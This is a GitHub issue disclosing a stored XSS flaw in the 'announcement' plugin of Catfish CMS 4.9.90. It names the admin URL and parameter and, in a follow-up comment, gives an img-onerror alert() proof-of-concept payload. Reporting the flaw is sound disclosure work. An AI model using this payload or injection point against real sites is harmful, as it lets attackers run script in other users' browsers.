Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

XSS in "announcement" plugin #7

Open
lcg22266 opened this issue Jul 8, 2020 · 2 comments
Open

XSS in "announcement" plugin #7

lcg22266 opened this issue Jul 8, 2020 · 2 comments

Comments

@lcg22266
Copy link

lcg22266 commented Jul 8, 2020

Catfish CMS V 4.9.90 allows XSS via the "announcement" plugin, the parameter "announcement_gonggao" in url http://127.0.0.1/cms/index.php/admin/Index/plugins/plugin/announcement.html

set the parameter :
announcement_gonggao: ">

open the index page ,the js is run.

@lcg22266
Copy link
Author

lcg22266 commented Jul 8, 2020

announcement_gonggao: "><img src="" onerror = alert(/xsstest/)>

@lcg22266
Copy link
Author

lcg22266 commented Jul 16, 2020

1
2

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant